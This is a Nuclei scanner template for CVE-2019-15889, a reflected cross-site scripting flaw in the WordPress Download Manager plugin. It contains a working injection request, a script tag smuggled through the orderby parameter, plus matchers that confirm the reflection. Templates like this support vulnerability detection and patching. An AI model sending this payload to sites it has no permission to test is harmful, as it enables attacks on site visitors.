nuclei-templates/cves/2019/CVE-2019-15889.yaml

39 lines
1.1 KiB
YAML
Raw Normal View History

2021-07-11 01:20:03 +00:00
id: CVE-2019-15889
info:
name: WordPress Plugin Download Manager 2.9.93 - Reflected Cross-Site Scripting (XSS)
author: daffainfo
severity: medium
2021-08-30 09:47:31 +00:00
description: The download-manager plugin before 2.9.94 for WordPress has XSS via the category shortcode feature, as demonstrated by the orderby or search[publish_date] parameter.
2021-08-30 18:22:12 +00:00
reference:
2021-08-30 09:47:31 +00:00
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15889
- https://www.cybersecurity-help.cz/vdb/SB2019041819
- https://wordpress.org/plugins/download-manager/#developers
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2019-15889
cwe-id: CWE-79
tags: cve,cve2019,wordpress,xss,wp-plugin
2021-07-11 01:20:03 +00:00
requests:
- method: GET
path:
- '{{BaseURL}}/wpdmpro/list-packages/?orderby=title%22%3E%3Cscript%3Ealert(1)%3C/script%3E&order=asc'
matchers-condition: and
matchers:
- type: word
words:
- "<script>alert(1)</script>"
part: body
- type: word
part: header
words:
- text/html
- type: status
status:
- 200